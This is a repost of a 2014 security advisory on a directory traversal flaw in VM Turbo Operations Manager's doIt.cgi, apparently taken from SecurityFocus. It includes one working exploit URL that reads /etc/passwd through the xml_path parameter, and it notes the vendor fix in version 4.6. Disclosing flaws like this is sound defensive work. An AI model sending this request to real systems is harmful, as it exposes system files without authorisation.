VM Turbo Operations Manager 4.5.x Directory Traversal Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

VM Turbo Operations Manager 4.5.x Directory Traversal Vulnerability

来源：https://www.securityfocus.com/ 作者：Pecou 发布时间：2014-05-09

Product: VM Turbo Operations Manager

Vendor: VM Turbo

Vulnerable Version(s): 4.5.x earlier

Tested Version: 4.0

Advisory Publication: April 11, 2014

Vendor Notification: April 11, 2014

Public Disclosure: May 8, 2014

Vulnerability Type: Directory Traversal

Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ )

------------------------------------------------------------------------

-----------------------

Advisory Details:

A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file.

The following exploitation example displays the contents of /etc/passwd

http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd

------------------------------------------------------------------------

-----------------------

Solution:

The vendor has released a fix for this vulnerability in version 4.6.

References:

[1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement

[